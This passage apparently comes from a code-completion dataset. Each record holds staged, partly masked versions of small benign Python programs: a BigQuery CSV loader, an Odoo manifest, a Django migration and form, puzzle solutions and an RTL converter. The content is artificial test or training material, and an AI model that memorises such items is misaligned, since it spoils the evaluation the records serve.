client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-3": "import os\nfrom google.cloud import bigquery\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-4": "import os\nfrom google.cloud import bigquery\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [\n bigquery.SchemaField('id', 'INTEGER'),\n bigquery.SchemaField('first_name', 'STRING'),\n bigquery.SchemaField('last_name', 'STRING'),\n bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'),\n bigquery.SchemaField('ip_address', 'STRING')\n ]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n\n # get the URI for uploaded CSV in GCS from 'data'\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n\n # lets do this\n load_job = client.load_table_from_uri(\n uri,\n dataset_ref.table(os.environ['TABLE']),\n job_config=job_config)\n\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n\n load_job.result() # wait for table load to complete.\n print('Job finished.')\n\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))\n print('Loaded {} rows.'.format(destination_table.num_rows))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
{
'name': 'EDC Analytic Entry',
'depends': [
'stock_account',
'purchase_stock',
'account_accountant',
],
"description": """
""",
'author': "Ejaftech",
'data': [
'views/account_move_view.xml',
],
}
|
normal
|
{
"blob_id": "797e7c1b3e8b41a167bfbedfb6a9449e6426ba22",
"index": 8570,
"step-1": "<mask token>\n",
"step-2": "{'name': 'EDC Analytic Entry', 'depends': ['stock_account',\n 'purchase_stock', 'account_accountant'], 'description': '\\n ',\n 'author': 'Ejaftech', 'data': ['views/account_move_view.xml']}\n",
"step-3": "# -*- coding: utf-8 -*-\n{\n 'name': 'EDC Analytic Entry',\n 'depends': [\n 'stock_account',\n 'purchase_stock',\n 'account_accountant',\n\n ],\n \"description\": \"\"\"\n \"\"\",\n 'author': \"Ejaftech\",\n\n 'data': [\n 'views/account_move_view.xml',\n ],\n}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python
import sys
total = 0
for line in sys.stdin:
edges = [int(x) for x in line.split("x")]
edges.sort()
ribbon = sum(x * 2 for x in edges[:2])
l, w, h = edges
bow = l * w * h
total += bow + ribbon
print(total)
|
normal
|
{
"blob_id": "ed85cb61f4bc8bf758dafb10ffbabf87fb4521d0",
"index": 9281,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n edges = [int(x) for x in line.split('x')]\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n l, w, h = edges\n bow = l * w * h\n total += bow + ribbon\nprint(total)\n",
"step-3": "<mask token>\ntotal = 0\nfor line in sys.stdin:\n edges = [int(x) for x in line.split('x')]\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n l, w, h = edges\n bow = l * w * h\n total += bow + ribbon\nprint(total)\n",
"step-4": "import sys\ntotal = 0\nfor line in sys.stdin:\n edges = [int(x) for x in line.split('x')]\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n l, w, h = edges\n bow = l * w * h\n total += bow + ribbon\nprint(total)\n",
"step-5": "#!/usr/bin/env python\n\nimport sys\n\ntotal = 0\nfor line in sys.stdin:\n edges = [int(x) for x in line.split(\"x\")]\n\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n\n l, w, h = edges\n bow = l * w * h\n\n total += bow + ribbon\n\nprint(total)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
with open(r'D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming.txt') as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open(r'D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming1.txt', 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open(r'D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\guestbook.txt', 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
|
normal
|
{
"blob_id": "03da813650d56e7ab92885b698d4af3a51176903",
"index": 3878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\n<mask token>\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-3": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-4": "import datetime\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-5": "import datetime\n\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt') as f_obj:\n lines = f_obj.readlines()\n\nm_lines = []\n\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt', 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt', 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
Created on 13 Dec 2016
@author: hpcosta
'''
# https://www.hackerrank.com/challenges/backreferences-to-failed-groups
regex = r"^\d{2}(-?)\d{2}\1\d{2}\1\d{2}$" # Do not delete 'r'.
import re
print(str(bool(re.search(regex, raw_input()))).lower())
# Task
#
# You have a test string S.
# Your task is to write a regex which will match S, with following condition(s):
#
# S consists of 8 digits.
# S may have "-" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)
# Valid
#
# 12345678
# 12-34-56-87
# Invalid
#
# 1-234-56-78
# 12-45-7810
|
normal
|
{
"blob_id": "e884ce5878de75afe93085e2310b4b8d5953963a",
"index": 337,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-3": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\n<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-4": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\nimport re\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-5": "'''\nCreated on 13 Dec 2016\n\n@author: hpcosta\n'''\n# https://www.hackerrank.com/challenges/backreferences-to-failed-groups\n\nregex = r\"^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$\" # Do not delete 'r'.\n\nimport re\n\nprint(str(bool(re.search(regex, raw_input()))).lower())\n\n\n\n# Task\n# \n# You have a test string S. \n# Your task is to write a regex which will match S, with following condition(s):\n# \n# S consists of 8 digits.\n# S may have \"-\" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)\n# Valid \n# \n# 12345678\n# 12-34-56-87\n# Invalid \n# \n# 1-234-56-78\n# 12-45-7810",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 3.0.1 on 2020-01-11 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0004_auto_20191230_2037'),
]
operations = [
migrations.AddField(
model_name='user',
name='circles',
field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'), ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG', 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리'),
),
migrations.AddField(
model_name='user',
name='department',
field=models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'), ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC', '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT', 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True, verbose_name='학과'),
),
migrations.AlterField(
model_name='user',
name='level',
field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2', 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3, max_length=18, verbose_name='등급'),
),
]
|
normal
|
{
"blob_id": "6aa762165dba891a3638d13862019dd342a7e05a",
"index": 7644,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0004_auto_20191230_2037')]\n operations = [migrations.AddField(model_name='user', name='circles',\n field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'),\n ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG',\n 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리')),\n migrations.AddField(model_name='user', name='department', field=\n models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'),\n ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC',\n '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT',\n 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True,\n verbose_name='학과')), migrations.AlterField(model_name='user', name=\n 'level', field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2',\n 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3,\n max_length=18, verbose_name='등급'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0004_auto_20191230_2037')]\n operations = [migrations.AddField(model_name='user', name='circles',\n field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'),\n ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG',\n 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리')),\n migrations.AddField(model_name='user', name='department', field=\n models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'),\n ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC',\n '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT',\n 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True,\n verbose_name='학과')), migrations.AlterField(model_name='user', name=\n 'level', field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2',\n 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3,\n max_length=18, verbose_name='등급'))]\n",
"step-5": "# Generated by Django 3.0.1 on 2020-01-11 19:59\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('users', '0004_auto_20191230_2037'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='user',\r\n name='circles',\r\n field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'), ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG', 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리'),\r\n ),\r\n migrations.AddField(\r\n model_name='user',\r\n name='department',\r\n field=models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'), ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC', '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT', 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True, verbose_name='학과'),\r\n ),\r\n migrations.AlterField(\r\n model_name='user',\r\n name='level',\r\n field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2', 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3, max_length=18, verbose_name='등급'),\r\n ),\r\n ]\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django import forms
class photoForm(forms.Form):
iso = forms.ChoiceField(label='ISO', choices=[("100", 100),
("200", 200),
("300", 300),
("400", 400),
("500", 500),
("600", 600),
("700", 700),
("800", 800)], initial=800)
shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)
|
normal
|
{
"blob_id": "19b55b2de3d2ed16275cef572e3518fbb2457f84",
"index": 8293,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass photoForm(forms.Form):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass photoForm(forms.Form):\n iso = forms.ChoiceField(label='ISO', choices=[('100', 100), ('200', 200\n ), ('300', 300), ('400', 400), ('500', 500), ('600', 600), ('700', \n 700), ('800', 800)], initial=800)\n shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)\n",
"step-4": "from django import forms\n\n\nclass photoForm(forms.Form):\n iso = forms.ChoiceField(label='ISO', choices=[('100', 100), ('200', 200\n ), ('300', 300), ('400', 400), ('500', 500), ('600', 600), ('700', \n 700), ('800', 800)], initial=800)\n shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)\n",
"step-5": "from django import forms\n\nclass photoForm(forms.Form):\n iso = forms.ChoiceField(label='ISO', choices=[(\"100\", 100),\n (\"200\", 200),\n (\"300\", 300),\n (\"400\", 400),\n (\"500\", 500),\n (\"600\", 600),\n (\"700\", 700),\n (\"800\", 800)], initial=800)\n shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#-------------------------------------------------------------------------------
# rtlconverter.py
#
# PyCoRAM RTL Converter
#
# Copyright (C) 2013, Shinya Takamaeda-Yamazaki
# License: Apache 2.0
#-------------------------------------------------------------------------------
import sys
import os
import subprocess
import copy
import collections
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))) )
import utils.version
if sys.version_info[0] >= 3:
from rtlconverter.convertvisitor import InstanceConvertVisitor
from rtlconverter.convertvisitor import InstanceReplaceVisitor
else:
from convertvisitor import InstanceConvertVisitor
from convertvisitor import InstanceReplaceVisitor
import pyverilog.utils.signaltype as signaltype
from pyverilog.utils.scope import ScopeLabel, ScopeChain
import pyverilog.vparser.ast as vast
from pyverilog.vparser.parser import VerilogCodeParser
from pyverilog.dataflow.modulevisitor import ModuleVisitor
from pyverilog.ast_code_generator.codegen import ASTCodeGenerator
class RtlConverter(object):
def __init__(self, filelist, topmodule='userlogic', include=None,
define=None, single_clock=False):
self.filelist = filelist
self.topmodule = topmodule
self.include = include
self.define = define
self.single_clock = single_clock
self.top_parameters = collections.OrderedDict()
self.top_ioports = collections.OrderedDict()
self.coram_object = collections.OrderedDict()
def getTopParameters(self):
return self.top_parameters
def getTopIOPorts(self):
return self.top_ioports
def getCoramObject(self):
return self.coram_object
def dumpCoramObject(self):
coram_object = self.getCoramObject()
print("----------------------------------------")
print("CoRAM Objects in User-defined RTL")
for mode, coram_items in coram_object.items():
print(" CoRAM %s" % mode)
for threadname, idx, subid, addrwidth, datawidth in sorted(coram_items, key=lambda x:x[1]):
print(" %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)" %
(mode, idx, ( '' if subid is None else ''.join( ('[', str(subid), ']') ) ),
threadname, str(addrwidth), str(datawidth)))
def generate(self):
preprocess_define = []
if self.single_clock:
preprocess_define.append('CORAM_SINGLE_CLOCK')
if self.define:
preprocess_define.extend(self.define)
code_parser = VerilogCodeParser(self.filelist,
preprocess_include=self.include,
preprocess_define=preprocess_define)
ast = code_parser.parse()
module_visitor = ModuleVisitor()
module_visitor.visit(ast)
modulenames = module_visitor.get_modulenames()
moduleinfotable = module_visitor.get_moduleinfotable()
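        # Walk the design from the top module, rewriting CoRAM object instances and
        # collecting the replaced instances/ports/items for the second replacement pass below.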
instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable, self.topmodule)
instanceconvert_visitor.start_visit()
replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()
replaced_instports = instanceconvert_visitor.getReplacedInstPorts()
replaced_items = instanceconvert_visitor.getReplacedItems()
new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()
instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,
replaced_instports,
replaced_items,
new_moduleinfotable)
ret = instancereplace_visitor.getAST()
        # gather the user-defined I/O ports and parameters of the top module so they can be connected externally
frametable = instanceconvert_visitor.getFrameTable()
top_ioports = []
for i in moduleinfotable.getIOPorts(self.topmodule):
if signaltype.isClock(i) or signaltype.isReset(i): continue
top_ioports.append(i)
top_scope = ScopeChain( [ScopeLabel(self.topmodule, 'module')] )
top_sigs = frametable.getSignals(top_scope)
top_params = frametable.getConsts(top_scope)
for sk, sv in top_sigs.items():
if len(sk) > 2: continue
signame = sk[1].scopename
for svv in sv:
if (signame in top_ioports and
not (signaltype.isClock(signame) or signaltype.isReset(signame)) and
isinstance(svv, vast.Input) or isinstance(svv, vast.Output) or isinstance(svv, vast.Inout)):
port = svv
msb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.msb, top_scope))
lsb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.lsb, top_scope))
width = int(msb_val.value) - int(lsb_val.value) + 1
self.top_ioports[signame] = (port, width)
break
for ck, cv in top_params.items():
if len(ck) > 2: continue
signame = ck[1].scopename
param = cv[0]
if isinstance(param, vast.Genvar): continue
self.top_parameters[signame] = param
self.coram_object = instanceconvert_visitor.getCoramObject()
return ret
def main():
from optparse import OptionParser
INFO = "PyCoRAM RTL Converter"
VERSION = utils.version.VERSION
USAGE = "Usage: python rtlconverter.py -t TOPMODULE file ..."
def showVersion():
print(INFO)
print(VERSION)
print(USAGE)
sys.exit()
optparser = OptionParser()
optparser.add_option("-v","--version",action="store_true",dest="showversion",
default=False,help="Show the version")
optparser.add_option("-t","--top",dest="topmodule",
default="userlogic",help="Top module, Default=userlogic")
optparser.add_option("-o","--output",dest="outputfile",
default="out.v",help="Output file name, Default=out.v")
optparser.add_option("-I","--include",dest="include",action="append",
default=[],help="Include path")
optparser.add_option("-D",dest="define",action="append",
default=[],help="Macro Definition")
optparser.add_option("--singleclock",action="store_true",dest="single_clock",
default=False,help="Use single clock mode")
(options, args) = optparser.parse_args()
filelist = args
if options.showversion:
showVersion()
for f in filelist:
if not os.path.exists(f): raise IOError("file not found: " + f)
if len(filelist) == 0:
showVersion()
converter = RtlConverter(filelist, options.topmodule,
include=options.include,
define=options.define,
single_clock=options.single_clock)
ast = converter.generate()
converter.dumpCoramObject()
asttocode = ASTCodeGenerator()
code = asttocode.visit(ast)
f = open(options.outputfile, 'w')
f.write(code)
f.close()
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "55ffcf5e6120cc07da461e30979dd8a36a599bee",
"index": 8353,
"step-1": "<mask token>\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\ndef main():\n from optparse import 
